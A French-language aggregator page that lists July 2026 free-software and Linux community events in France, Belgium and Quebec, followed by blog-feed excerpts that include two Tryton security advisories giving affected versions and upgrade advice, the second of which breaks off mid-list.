Étienne Morency est architecte de solutions et passionné par les technologies ouvertes et l’optimisation des environnements TI. Il accompagne les organisations dans la conception et la mise en place de solutions robustes, pragmatiques et durables. Son expérience couvre l’architecture, l’automatisation, l’intégration et l’accompagnement des équipes techniques. Il agit également comme directeur technique de KeyHarbour, où il contribue à orienter les choix technologiques et l’évolution des solutions.

  1. Réseautage avec les autres Linuxien(ne)s

Une période d’échange de trucs et astuces sous Linux, où chacun est encouragé à partager ses connaissances.

Extras

Que vous soyez débutant ou expert, étudiant ou professionnel, cette réunion est ouverte à tous. Elle réunit une diversité de personnes, allant des gestionnaires aux programmeurs, des professeurs aux retraités, unissant ainsi des esprits passionnés par les logiciels libres, quel que soit votre domaine d’expertise.

Rejoignez-nous pour cette opportunité exceptionnelle de socialiser, d’apprendre, et de tisser des liens avec d’autres passionnés. Ensemble, nous pouvons approfondir notre compréhension des logiciels libres et contribuer à une communauté dynamique.

La participation est gratuite, et nous avons hâte de vous rencontrer, que ce soit en personne ou en ligne. Inscrivez-vous dès maintenant pour recevoir le lien de la réunion virtuelle, et pensez à nous informer si vous prévoyez de vous joindre à nous au Resto-Pub 100 Génies de l’ÉTS.

Au plaisir de partager cette soirée exceptionnelle avec vous!

Cordialement,

Comité organisateur des Rencontres Linux au Québec P.S.: Pour le transport en commun : Station de métro Bonaventure

[FR Lyon] Polar en Vacances, 11ᵉ édition – Du mercredi 8 juillet 2026 à 13h00 au jeudi 9 juillet 2026 à 09h00.

C’EST QUOI ?

Commencez votre été avec le festival Polar en Vacances !

Traditionnel rendez-vous jeunesse donné par Quais du Polar au mois de juillet, Polar en Vacances revient pour sa 11ᵉ édition les mercredi 8 et jeudi 9 juillet 2026 afin de promouvoir la lecture et l’écriture auprès des plus jeunes !

Au programme : des ateliers d’écriture, d’illustration et de découpage, un espace dédié à la lecture, un espace jeux de société, un escape game et un espace librairie jeunesse qui accueillera les dédicaces de nos autrices et illustratrices invitées. Cette année, la thématique sera centrée autour des « Petits et grands héros »

Les ateliers sont GRATUITS et sur inscription obligatoire pour les groupes et recommandée pour les familles.

[FR Fourmies] La permanence du libre – Le mercredi 8 juillet 2026 de 13h30 à 17h00.

Dans le cadre de la stratégie Rev3 de la ville de Fourmies est né le Central, Carrefour de la Résilience.

À ce titre, l’Association Club Linux Nord Pas-de-Calais Fourmies vous accompagne et vous guide dans la configuration, la personnalisation et la prise en main de vos logiciels (Libres).

C’est un espace de rencontres et d’échanges, uniquement basés sur les logiciels libres et le concept de l’open source.

De 13h30 à 17h00 tous les mercredi, venez prendre en main vos logiciels libres et vos installations Linux Mint ou Mageia.

La permanence du libre est un complément des install parties du samedi.

Cette manifestation a lieu au Tiers-Lieu Le Central à Fourmies.

[FR Nantes] Repair Café numérique + Install Party – Le mercredi 8 juillet 2026 de 14h00 à 18h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Gond-Pontouvre] Permanence du mercredi – Le mercredi 8 juillet 2026 de 14h00 à 18h00.

Nous sommes convaincus depuis le début qu’un ordinateur n’est pas un consommable jetable et qu’on a tous le droit de comprendre et de maîtriser nos outils numériques. C’est de là qu’est née l’asso, à Gond-Pontouvre: un repaire de passionnés du libre et du bidouillage, où l’on défend les logiciels libres, la souveraineté technologique et le bon vieux plaisir de mettre les mains dans le cambouis. Au fil du temps, on a élargi le terrain de jeu, mais l’esprit reste le même: on apprend, on partage, on transmet.

Le cœur historique, c’est le reconditionnement. On collecte des machines en fin de vie, on les teste sous toutes les coutures, et on leur offre une seconde jeunesse: passage en SSD pour réveiller les plus poussives, installation de Linux Mint pour un système libre, léger et accessible, et hop – un PC qu’on croyait bon pour la benne repart pour plusieurs années.

Vous avez un vieux portable qui rame ou une tour oubliée au grenier? Apportez-la, on regarde ensemble.

Côté fabrication numérique, le FabLab ouvre ses portes: venez concevoir et fabriquer vos projets sur nos machines – impression 3D (Creality K1 Max & K2 Plus), découpe et gravure laser (Falcon 2 Pro 60W), et de quoi toucher à
l’électronique embarquée. Les bénévoles sont là pour vous guider – l’idée n’est pas de faire à votre place, mais de vous apprendre à faire.

Entrée libre, esprit d’entraide et de partage des savoirs. Apportez vos questions, vos machines ou simplement votre curiosité.

[FR Muzillac] Formation : Maîtriser un gestionnaire de mots de passe – Le mercredi 8 juillet 2026 de 16h00 à 18h00.

Aujourd’hui, le risque de voir pirater ses différents comptes en ligne est très élevé. Afin de s’en protéger, nous devons avoir des mots de passe complexes, différents pour chaque service et pouvoir les modifier régulièrement. Cela devient un véritable casse-tête.

L’association Ourse a pour objet d’animer et administrer notre monnaie locale. Ce faisant, nous avons d’autant plus besoin de nous mettre à l’abri des risques de vols de données. C’est pourquoi nous avons dû notamment apprendre la maîtrise du gestionnaire de mots de passe libre KeepassXC.

Cette formation vise à diffuser auprès des bénévoles l’utilisation de ce logiciel et la mise en place de pratiques sécurisées et est ouverte à tous.

Sur inscription sur ce formulaire ; places limitées et des téléchargements sont recommandés en amont. Apporter son ordinateur portable et smartphone. L’objectif est d’en ressortir avec les compétences et tout le système nécessaire installé et fonctionnel sur vos appareils.

D’autres séances pourront être proposées ultérieurement.

[FR Marseille] Réunion d’information. Installation Linux – Le mercredi 8 juillet 2026 de 18h00 à 19h00.

💻🌱 Ton ordi rame avec Windows? T’as entendu parler de Linux sans oser te lancer?

Viens à une Install Party chez Emmaüs Connect à Marseille!
On t’informe et on t’aide à installer Linux Mint sur ton ordi, gratuitement, dans la bonne humeur et entouré·e de bénévoles super cool 😎
Tu repars avec un PC rafraîchi… et zéro centime dépensé 💸

🎯 C’est pour toi si:

  • Tu veux prolonger la vie de ton ordi sans passer par Windows 11
  • Tu veux apprendre à mieux maîtriser ton outil numérique
  • Tu veux faire un geste pour la planète ♻️
  • Tu veux découvrir un super lieu de solidarité numérique à Marseille!

📍 Où ? 11 cours Franklin Roosevelt, Marseille 1er
📆 Quand? Réunion d’information le 08/07 à 18h, Install'Party le 18/07 à 9h30.

Inscription uniquement par mail à marseille@emmaus-connect.org

Rejoins-nous pour une expérience libre, écolo et solidaire!

[FR Lyon] Réunion mensuelle – Le mercredi 8 juillet 2026 de 19h00 à 22h00.

Réunion ouverte à tous, adhérent ou pas.

Les réunions mensuelles Hadoly ont lieu tous les 2ᵉ mercredi du mois, à partir de 19h.

Soit en présentiel dans les locaux de la maison de l’écologie – 4 rue Bodin 69001 Lyon

Soit en distanciel sur l’adresse https://jitsi.hadoly.fr/permanence-hadoly.

À propos de cet événement

La permanence (mensuelle) d’Hadoly (Hébergeur Associatif Décentralisé et Ouvert à LYon), chaton lyonnais, est l’occasion d’échanger avec les membres de l’asso sur les services et moyens mis à disposition des adhérents afin de se libérer des Gafams tout en partageant ce que chacun·e aura amené pour grignoter ou boire.

Nous partageons du mail, du cloud, et d’autres services, le tout basé exclusivement sur une infrastructure locale et des logiciels libres. Nous respectons la neutralité du net et la vie privée. Plus largement nous échangeons autour des communs numériques, des cultures libres et de l’éducation populaire par exemple en réalisant ou animant des ateliers d’éducation aux médias.

Vous serez bienvenu pour présenter votre projet, celui de votre organisation, causer communs numériques, cultures libres et éduc pop.

[FR Bordeaux] Cours gratuits d’Espéranto – Le mercredi 8 juillet 2026 de 20h00 à 22h00.

Saluton,

Nous proposons une nouvelle session de cours d’Espéranto qui débuteront début juin au café Le Petit Grain, Place Dormoy à Bordeaux (c’est un café associatif avec des tarifs abordables dans le quartier de la gare Saint-Jean à côté de Barbey).

L’espéranto est plus qu’une langue neutre et facile, mais aussi une langue fraternelle et libre qui permet de voyager dans le monde entier avec des facilités d’hébergement ou de fraterniser avec des personnes dans d’autres pays.

Cette vidéo vous permettra d’en savoir plus: https://peertube.dc.pini.fr/w/akMZAKM9zJWG5mXLBtuQN4
Vous trouverez également plus d’informations sur: https://esperanto-gironde.fr/lesperanto/, il y a l’abonnement à la lettre d’informations mensuelle qui est proposée en fin de chaque page afin de rester informé des activités espérantistes du coin.

Les cours ont lieu le mercredi soir de 20h00 à 22h00, 10 soirs pour réaliser les 10 leçons. Ces leçons complètent le cours de l’application Duolingo.
Début: mercredi 3 juin 2026.

Les cours sont GRATUITS pour les membres du café associatif.
Cependant, vous devrez adhérer au café associatif Le Petit Grain qui nous prête chaleureusement ses locaux si vous n’êtes pas membre. L’adhésion annuelle pour toute l’année 2026 est à prix libre conseillé à 5€, minimum 2€ et permet aussi la participation aux autres ateliers et activités.

N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) ou en répondant à ce message pour plus d’informations ou pour vous inscrire.
Vous pouvez aussi nous rencontrer chaque 3ᵉ mercredi du mois de 18h00 à 19h30 au café Le Petit Grain ainsi que lors du défilé du 1ᵉʳ mai autour de notre banderole.

Ĝis la revido.

[Internet] Mini-webinaire Scenari : L’après-Canoprof : des solutions pour utiliser ses contenus au-delà du 31 juillet 2026 – Le jeudi 9 juillet 2026 de 15h30 à 16h30.

Mini-webinaire plutôt orienté enseignement primaire/secondaire.

Suite à l’arrêt annoncé par Réseau Canopé de la plateforme CanoprofCloud pour le 31 juillet 2026, nous te présenterons un nouveau service en ligne proposé par Kelis ainsi que d’autres solutions pour aider à récupérer et continuer à utiliser les contenus Canoprof. Nous en profiterons pour refaire un point sur le contexte et le vocabulaire autour du système Scenari.

Toutes les informations sur https://info.prof.scenari.cloud/

[BE Lessines] Atelier les co-libristes – Le jeudi 9 juillet 2026 de 18h00 à 21h30.

Atelier sur les logiciels libres.

Installation et configuration.

Hygiène numérique.

[FR Romans-Sur-Isere] Install Party Linux – Le jeudi 9 juillet 2026 de 18h00 à 22h00.

Nous organisons la 1e Install Party a Romans-Sur-Isere au cafe associatif le PasSage

Venez decouvrir le logiciel libre, discuter autour d’un verre, installer votre pc avec un systeme libre.

[BE Huy] Réunion mensuelle LiHuy – Le jeudi 9 juillet 2026 de 19h30 à 22h30.

L’occasion idéale pour se retrouver, échanger autour du logiciel libre, vous accompagner dans le remplacement de Windows par Linux sur vos machines (sans dual-boot), ou encore découvrir ensemble de nouvelles distributions et applications.

[FR Quimperlé] Point info GNU/Linux – Le vendredi 10 juillet 2026 de 13h30 à 17h30.

Médiathèque de Quimperlé, place Saint Michel, pas d’inscription, entrée libre !

Mickaël, Johann, Alain, et Yves vous accueillent (ou l’un d’eux, on se relaie !).

Conseils, aide et infos pratiques GNU/Linux et Logiciels Libres.

Curieux ? Déjà utilisateur ? Expert ? Pour résoudre vos problèmes, vous êtes le bienvenu ; pas besoin de prendre rendez-vous !

N’hésitez pas à venir avec votre PC si vous voulez une installation de GNU/Linux ou de venir avec votre périphérique récalcitrant (imprimante, scanner…) si possible.

[FR Nantes] Repair Café numérique + Install Party – Le vendredi 10 juillet 2026 de 14h00 à 17h00.

Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

Marre de Windows et envie d’un peu de liberté, venez le libérer!

[FR Brest] Atelier d’été – LAN Jeux Vidéo Libres – Le vendredi 10 juillet 2026 de 14h00 à 17h00.

La plus grande LAN partie sous linux de Brest cet été 💥

Venez avec ou sans votre ordinateur, sous Linux ou BSD 🐧

Que vous vouliez vous exploser sur Xonotic ou Teeworlds, reconstruire les 4 moulins dans Luanti, ou être le meilleur stratège du siècle dans 0ad, vous passerez forcément un bon moment 🎊

Entrée libre pour tout le monde.

--

Le local est accessible aux personnes à mobilité réduite

Il y a des arceaux à vélo à proximité

L’arrêt de bus le plus proche est: Cosmao Prétot, ligne 2B

L’arrêt de tramway le plus proche est: Polygone

[FR Le Tholonet (Palette)] Réunion mensuelle de l’Axul – Le vendredi 10 juillet 2026 de 20h00 à 23h00.

Les membres de l'Axul (Association du Pays d’Aix des Utilisateurs de Linux et des Logiciels Libres) vous invitent à leur réunion réelle du vendredi 10 juillet de 20h00 à 23h00 au Centre Culturel Georges Duby du Tholonet, 744 avenue Paul Julien, à proximité de la place du marché de Palette (premier village sur la D7n au Sud-Est d’Aix).

  • 20h00 – 20h15: Accueil
  • 20h15 – 20h30: Présentation des participants et organisation de la soirée
  • 20h30 – 23h00:
  • Interventions urgentes si nécessaires
  • Discussions et décisions importantes
  • Interventions extérieures (Forum des Associations & du bénévolat
  • Précisions sur le don probable d’ordinateurs (suite)
  • Annuaire des membres (suite)
  • Organisation des listes de diffusion

  • Autres questions ?

Évènements ultérieurs: voir l'Agenda du Libre

Ces réunions libres et gratuites sont ouvertes à toutes et à tous, débutantEs ou expertEs GNU/Linux, membres ou non de l'Axul.

Entrée Libre. Tout Public.

[Internet] Pause Café Linux : Votre rendez-vous hebdomadaire – Le vendredi 10 juillet 2026 de 11h45 à 13h00.

Pause Café Linux: Votre rendez-vous hebdomadaire

Est-ce que Linux vous passionne ? Vous voulez simplement jaser de logiciels libres dans une ambiance décontractée ? Rejoignez-nous pour la Pause Café Linux, un rendez-vous unique dans la francophonie Linuxienne ! C’est le moment idéal pour briser l’isolement, partager vos découvertes et rencontrer d’autres passionnés de l’écosystème Linux au Québec.

C’est quand ?

Tous les vendredis midis (12h00 HAE, Québec).

Apportez votre lunch, nous fournissons le café… virtuellement !

Au programme

  • Discussion libre: Pas d’ordre du jour rigide, on parle de ce qui vous anime.
  • Tour de table rapide: Afin de mieux se connaître.
  • Le Brise-Glace: Une question thématique différente pour lancer la conversation.
  • Entraide et partage: Un espace bienveillant pour tous les niveaux, du débutant à l’expert.

Comment participer ?

  • Échangez avec nous: Rejoignez notre canal de discussion sur Framateam pour vous présenter et rester informé. Rejoindre le canal Pause Café
  • Connectez-vous à la rencontre: Tous les vendredis midis, cliquez simplement sur le lien ci-dessous pour accéder à notre salon de visioconférence (BigBlueButton). Accéder au salon virtuel (BBB)

Venez avec votre lunch, votre café, et surtout votre curiosité !

La participation est gratuite, ouvert à tous!

Notre réunion accueille une diversité de profils: étudiants, professionnels, gestionnaires, programmeurs, professeurs, ou retraités. Que votre passion soit l’administration système, le développement, ou la simple utilisation quotidienne, votre expérience est précieuse. Ensemble, nous pouvons approfondir notre compréhension des logiciels libres et contribuer à une communauté dynamique.

Rejoignez-nous pour cette opportunité exceptionnelle de socialiser, d’apprendre, et de tisser des liens !

Nous avons hâte de vous y accueillir.

Le Comité organisateur des Rencontres Linux au Québec

[FR Amancy] Rencontre « Logiciels Libres » – Le samedi 11 juillet 2026 de 09h00 à 12h00.

Rencontre mensuelle autour des logiciels libres, en toute simplicité.

Ces matinées seront ce que nous en ferons ensemble, selon vos attentes:

  • Découverte des logiciels libres dont Linux et de leur intérêt. Utilisation sur place.
  • Installations, sur votre machine (pensez à sauvegarder vos données avant de venir avec) ou sur des PC fournis pour apprendre ensemble sans risque. Parfois, on vous propose un ordinateur auquel Linux a redonné une seconde vie, avec lequel vous pouvez repartir…
  • Préparation d’une clé USB pour tester Linux chez vous, l’installer ou alors pour utiliser des logiciels libres sans installation sous Windows.
  • Entraide, suivi de votre expérience avec les logiciels libres.
  • Nous pourrons aussi nous intéresser aux outils en ligne, aux smartphones, ou nous amuser à redonner vie à de vieux PC un peu obsolètes, à reconditionner des ordinateurs pour des associations ou personnes avec peu de ressources, etc.

Pour tout projet qui risque de prendre un peu de temps, il est préférable de nous contacter avant.

Les débutant·e·s sont les bienvenu·e·s! Les autres aussi, bien évidemment !

[FR Chaumont] Permanence Informatique – Le samedi 11 juillet 2026 de 09h00 à 12h00.

REVOL, association engagée dans la promotion des logiciels libres, propose tous les samedis matin, de 9h à 12h, une permanence informatique associative ouverte à toustes, pour se pencher sur les difficultés rencontrées par chacun·e dans son usage de l’outil numérique.

=> Vous avez un problème avec votre ordinateur ?
=> Une question sur un logiciel libre ?
=> Envie de comprendre un peu mieux comment ça fonctionne ?

On prend le temps avec vous, simplement.

Nous pouvons vous accompagner sur:

  • le passage vers des systèmes libres (Linux Mint, MX Linux…)
  • l’installation et la prise en main de logiciels libres
  • la remise en état et la mise à jour de votre ordinateur (quand c’est possible)
  • des conseils pour mieux utiliser, sécuriser et prolonger la vie de votre matériel

Et aussi… juste discuter (on a du café et des croissants).
Que ce soit pour poser une question, réfléchir à vos usages ou découvrir le libre tranquillement.

Pas besoin d’être expert·e: venez comme vous êtes.

Nous sommes à notre local, 22 rue de Verdun à Chaumont (52000), en Haute-Marne.

Un monde plus libre, loin des techno-fascistes, ça serait 🦉 quand même, non ?

REVOL est là pour y contribuer !

[FR Montpellier] Rencontre | Pique-nique du Libre – Le samedi 11 juillet 2026 de 17h00 à 19h00.

Montpel’libre et ses partenaires vous proposent de nous retrouver comme chaque année toutes et tous, pour clore cette année très intense dans un esprit festif, à l’occasion d’un pique-nique au Parc Rimbaud dans le quartier Les Aubes de Montpellier. Où, les familles, enfants, curieux et bien sûr libristes sont les bienvenus.

Ce pique-nique traditionnel de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une véritable institution.

Nous serions heureux de compter sur votre présence à cet instant convivial et de partage de la communauté des Logiciels Libres et des Communs de la région.

Attention, privilégiez les transports en commun, les emplacements de parking à proximité sont rares!

L’inscription n’est pas obligatoire, mais fortement recommandée pour des raisons évidentes de contraintes logistique.

Cette année encore, afin de nous mettre en conformité avec l’arrêté préfectoral, les barbecues et tout feu seront interdits, le repas sera donc froid.

Pas de réseau wifi, ni électrique, pensez à prendre des lampes.

Le site dispose à l’entrée d’une petite aire de jeux pour les enfants, d’un parc clôturé pour les chiens, de balades, randonnées, tables, potager, boulodrome, vue sur le rivière.

Chacun apporte quelque chose, et on partage. Pensez à prendre de l’eau, des brumisateurs, des chapeaux pour supporter les fortes chaleurs. Prévoyez aussi des boules de pétanque.

[FR Montpellier] Rencontre | Wiknic – Le samedi 11 juillet 2026 de 19h00 à 21h00.

Rencontre | Wiknic

Ce pique-nique traditionnel de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée. Ce traditionnel rendez-vous est devenu, au fil du temps et selon la presse, une véritable institution.

Samedi 11 juillet 2026 de 19h00 à 21h00
Parc Rimbaud, 880 avenue de Saint-Maur, 34000 Montpellier

Inscriptions | GPS 43.61797/3.89607

[FR Redon] Install Party – Le dimanche 12 juillet 2026 de 14h00 à 18h00.

Fin du support Windows? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.

Plusieurs bénévoles à l’aise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche à suivre.

Si possible, préparez vos sauvegardes des documents importants avant de venir.

Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps!).

Entrée libre et gratuite,

Organisé par le Collectif Low Tech du Pays de Redon

[FR Redon] Install Party Linux – Le dimanche 12 juillet 2026 de 14h00 à 18h00.

Fin du support Windows ? Ne jetez pas votre PC: venez découvrir et installer Linux sur votre ordinateur.

Plusieurs bénévoles à l’aise en informatique prendront le temps de connaitre votre situation, et de vous proposer une marche à suivre.

Si possible, préparez vos sauvegardes des documents importants avant de venir.
Sinon, venez avec un disque dur ou clé USB de grande capacité pour les sauvegarder avec notre aide et un peu de temps (la sauvegarde de vos données peut prendre du temps !).

Entrée libre et gratuite, rdv 14h

Organisé par le Collectif Low Tech du Pays de Redon

[FR Béziers] Rencontre | Pique-nique du Libre – Le dimanche 12 juillet 2026 de 17h00 à 19h00.

Montpel’libre vous propose de nous retrouver toutes et tous, pour clore cette année très intense dans un esprit festif, à l’occasion d’un pique-nique au Plateau des Poètes, Allées Paul Riquet à Béziers. Où, les familles, enfants, curieux et bien sûr libristes sont les bienvenus.

Ce pique-nique de fin d’année des libristes de toute la région est organisé pour boucler l’année dans la bonne humeur, évoquer les moments importants qui se sont déroulés dans l’année et ceux qui nous attendent à la rentrée.

Les pique-niques de l’été
Samedi 11 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Parc Rimbaud à Montpellier.
Samedi 11 juillet 2026 à partir de 19h00, Wiknic (Cabalhérault), au Parc Rimbaud à Montpellier.
Dimanche 12 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Plateau des Poètes à Béziers.
Samedi 18 juillet 2026 à partir de 17h00, Pique-nique du Libre, aux Jardins de la Fontaine à Nîmes.
Dimanche 19 juillet 2026 à partir de 17h00, Pique-nique du Libre, à Pierres Blanches à Sète.
Dimanche 26 juillet 2026 à partir de 17h00, Pique-nique du Libre, au Parc Jean Hugo à Lunel.

Choisissez votre pique-nique. Mais bien sûr, vous pouvez participer à plusieurs pique-niques, voire à tous !

L’été est là, bien installé, les oiseaux chantent, le soleil est au beau fixe, et vous souhaitez déjeuner entre amis sur l’herbe fraîchement coupée.

Dès que l’on recommence à avoir des journées ensoleillées et chaudes, nous savons tous et toutes que la saison des pique-niques est arrivée ! Nous aimons, à n’en pas douter, absolument tout du concept des pique-niques: manger à l’extérieur sous le soleil ou à l’ombre des arbres, partager un repas convivial, simple, à la bonne franquette entre amis, avec la famille, profiter de la beauté de la nature qui nous entoure, prendre son temps et apprendre à ralentir et à reconnecter au moment présent le temps d’un repas.

Même si l’été est déjà bien entamé, nous avons encore beaucoup de belles journées chaudes à venir et la chance de faire de nombreux pique-niques avant la fin de la saison estivale.

Afin de favoriser l’échange et la convivialité, nous vous invitons à participer à ces repas partagés. Chaque participant est encouragé à apporter un plat fait maison (entrée, plat principal, dessert, fruits, boissons…) à partager avec les autres. C’est l’occasion de découvrir de nouvelles saveurs tout en échangeant des idées et des expériences autour, vous l’aurez deviné, des logiciels libres.

Ces rencontres sont aussi l’occasion de discuter des projets communautaires, d’apprendre ensemble, et de promouvoir un mode de vie plus libre, collaboratif et respectueux de l’environnement. N’hésitez pas à apporter également des jeux de plein air ou des instruments de musique pour ajouter encore plus de convivialité et de bonne humeur à ces moments partagés en pleine nature que nous affectionnons tous et toutes.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

Framasoft

IA et éducation (1/2) : plongée dans l’IApocalypse éducative


France 🇫🇷
Publié le
dimanche 05 juillet 2026 10h00
Importé le
dimanche 05 juillet 2026 13h03
L’IA générative est en train de transformer en profondeur le monde de l’éducation, où les élèves l’utilisent massivement pour faire leurs devoirs. Entre dénis et illusions, comment s’adapter ? Faut-il s’adapter ?
Franciliens.net

« Premier samedi du libre » de juillet 2026


Île-de-France 🇫🇷
Publié le
vendredi 03 juillet 2026 17h24
Importé le
vendredi 03 juillet 2026 21h03
Fidèles au poste (et de retour au Carrefour numérique² !), nous serons au PSL du 4 juillet 2026 pour accueillir les curieux·ses des Fournisseurs d’Accès Internet citoyens, discuter neutralité du net, protection de la vie privée, données personnelles, et bien sûr auto-hébergement en présentant et aidant à l’installation de briques internet.Venez nous rencontrer ! Informations pratiques Samedi …

Continuer la lecture de « « Premier samedi du libre » de juillet 2026 »

CERCLL

Pouet.chapril.org – Mastodon.


Provence-Alpes-Côte d'Azur 🇫🇷
Publié le
vendredi 03 juillet 2026 13h32
Importé le
vendredi 03 juillet 2026 21h04
Mastodon : réseau social de microbloging libre, décentralisé et fédéré. Pouet.chapril.org est un service de microblog basé sur le logiciel Mastodon. Mastodon est un réseau social et logiciel de microblog auto-hébergé, libre, distribué et décentralisé via ActivityPub au sein du Fediverse. Il permet de courts messages (« pouets » ou toots dans d’autres langues dont l’anglais), images et […]
Loxodata

Retour sur POSETTE 2026


Bourgogne-Franche-Comté 🇫🇷
Publié le
vendredi 03 juillet 2026 11h30
Importé le
vendredi 03 juillet 2026 13h04

Posette 2026 : demandez le programme

Pour sa cinquième année, l’évènement virtuel POSETTE s’est déroulé du 16 au 18 juin 2026.

Cette conférence virtuelle et gratuite sponsorisé par Microsoft propose durant trois jours 44 présentations, réparties en quatres diffusions en direct (sur deux fuseaux horaires). Le serveur Discord afin de poser des questions aux orateurs et de discuter avec les autres participants est accessible ici.

Le programme complet est disponible sur le site de la conférence et le planning des diffusions :

Vous pouvez regarder le replay de chaque diffusion, ou chaque conférence sur le site, ou sur Youtube.

Cette année, la conférence propose une keynote de plusieurs développeurs PostgreSQL sur la version 19, et une autre sur les contributions de Microsoft à PostgreSQL. Parmi les autres conférences, on retrouve des sujets sur la performance, la sécurité, les types de données, le langage SQL, des extensions, de la conception, du MCP et des produits Microsoft.

Crédits photo : Microsoft

ritimo

Chronique àMer : L'enfermement tout au long de l'exil. Partie 1 : Arrivé·es en Europe


Île-de-France 🇫🇷
Publié le
vendredi 03 juillet 2026 10h50
Importé le
vendredi 03 juillet 2026 13h03

Ce podcast aborde la question de l'enfermement des personnes en mouvement tout au long de la route. Ce premier volet traite de la question des prisons et de l'enfermement des personnes en exil, une fois passées les frontières européennes.

- Articles et traductions / Europe, droit d'asile, politique migratoire, migration, prison, violence, répression, multimédia, frontière, exil
April

Les podcasts « Libre à vous ! » pour accompagner votre été !


France 🇫🇷
Publié le
vendredi 03 juillet 2026 08h06
Importé le
vendredi 03 juillet 2026 13h03

Les vacances approchent, vous allez peut-être voyager, vous balader ou simplement vous livrer à un doux farniente. Pour accompagner votre été que diriez-vous d'écouter (ou réécouter) des podcasts de Libre à vous !, l'émission de l'April sur radio Cause Commune.

"

À votre disposition 280 émissions et 6 émissions musicales, découpées en plusieurs sujets disponibles individuellement (d'une dizaine de minutes à une heure), pour en apprendre plus sur les enjeux et l’actualité du logiciel Libre, sur les actions de l'April, et comment agir avec elle, et pour vous permettre de prendre le contrôle de vos libertés informatiques ! Sur un chemin de randonnée, dans votre lit, au camping au ailleurs, « bref, c'est Libre à vous ! ».

Au programme : des parcours libristes, migrer de Windows vers un système libre, la bureautique libre, la gestion associative, la production et gestion de contenus, la médiation numérique, les CRM, Mastodon, jeux vidéos, Drupal, diversité de genre, le travail parlementaire, les actions et le fonctionnement de l'April, l'Éducation nationale, les services libres et loyaux, science ouverte, la libération de code, l'accessibilité, l'achat de matériel, le financement de projets, la Gendarmerie nationale, l'ANSSI, les stratégies logiciel libre d'entreprises, les espaces publics numériques, logiciel libre et collectivités, entreprises, associations, le métier du développement logiciel libre, téléphonie mobile et libertés, les distributions GNU/Linux, l'Open Bar Microsoft/Défense, les GULL (Groupes d'utilisateurs et d'utilisatrices de logiciel libre), les données publiques, Wikipédia, Framasoft, Open Food Facts, OpenStreetMap, les DRM (menottes numériques), la formation, l'apprentissage de la programmation, la santé, système d’information géographique libre, démarches de sensibilisatio, sentiers de randonnée, PostgreSQL, Aaron Swartz, des projets de loi, les géocommuns, œuvres littéraires libres, des musiques libres… et les chroniques de notre équipe.

S'abonner au podcast
pour écouter ou télécharger
les émissions

Bonne écoute et bonnes vacances à celles et ceux qui en prennent.

C'est quoi un podcast ?

Un podcast audio est un fichier numérique, disponible sur Internet, permettant d'écouter son contenu (une émission de radio par exemple) n’importe où et n’importe quand.

En vous abonnant au flux de données du podcast, toutes les nouvelles diffusions sont notifiées automatiquement sur votre appareil de lecture (ordinateur, téléphone mobile…). Et vous pouvez écouter le contenu et aussi le télécharger.

Comme lecteur, vous pouvez par exemple utiliser AntennaPod sur Android, ou GPodder, qui est disponible sur plusieurs plateformes. Wikipédia propose une liste de lecteurs.

Tous les podcasts par émission et également par sujet disponibles sur cette page avec un aperçu du programme de l'émission.

Les images d'illustration

L'image avec la voiture a été réalisée par Antoine Bardelli.

L'image avec les trois personnages qui randonnent a été réalisée par Arnaud Champollion.

Les deux images sont diffusées selon les termes d’au moins une des licences suivantes : licence Art libre version 1.3 ou ultérieure, licence Creative Commons By Sa version 2.0 ou ultérieure, licence GNU FDL version 1.3 ou ultérieure.

Tryton

Security Release for issue 14907


Wallonie 🇧🇪
Publié le
vendredi 03 juillet 2026 08h00
Importé le
vendredi 03 juillet 2026 13h04

Cédric Krier has discovered that access is not enforced when browsing record instances in template.

Impact

CVSS v3.0 Base Score: 6.5

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: None
  • Availability: None

Workaround

There is no workaround.

Resolution

All affected users should upgrade trytond, marketing_automation and marketing_email to the latest version.

Affected versions per series:

  • trytond:
    • 8.0: <= 8.0.5
    • 7.8: <= 7.8.11
    • 7.0: <= 7.0.52
  • markting_automation:
    • 8.0: <= 8.0.0
    • 7.8: <= 7.8.2
    • 7.0: <= 7.0.3
  • marketing_email:
    • 8.0: <= 8.0.0
    • 7.8: <= 7.8.2
    • 7.0: <= 7.0.2

Not affected versions per series:

  • trytond:
    • 8.0: >= 8.0.6
    • 7.8: >= 7.8.12
    • 7.0: >= 7.0.53
  • markting_automation:
    • 8.0: >= 8.0.1
    • 7.8: >= 7.8.3
    • 7.0: >= 7.0.4
  • marketing_email:
    • 8.0: >= 8.0.1
    • 7.8: >= 7.8.3
    • 7.0: >= 7.0.3

Reference

Concerns?

Any security concerns should be reported on the bug-tracker at https://bugs.tryton.org/ with the confidential checkbox checked.

1 post - 1 participant

Read full topic

Tryton

Security Release for issue #5160 and #14869


Wallonie 🇧🇪
Publié le
vendredi 03 juillet 2026 08h00
Importé le
vendredi 03 juillet 2026 13h04

The user titou has discovered that the administrator group can execute Python code on the server which is hidden inside an uploaded report template.
And Dan Shallom has discovered that the same can also be accomplished by the marketing group when uploading marketing email templates.

Impact

CVSS v3.0 Base Score: 6.5

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: None
  • Availability: None

Workaround

There is no workaround.

Resolution

All affected users should upgrade trytond to the latest version.

Affected versions per series:

  • trytond:
    • 8.0: <= 8.0.5
    • 7.8: <= 7.8.11
    • 7.0: <= 7.0.52

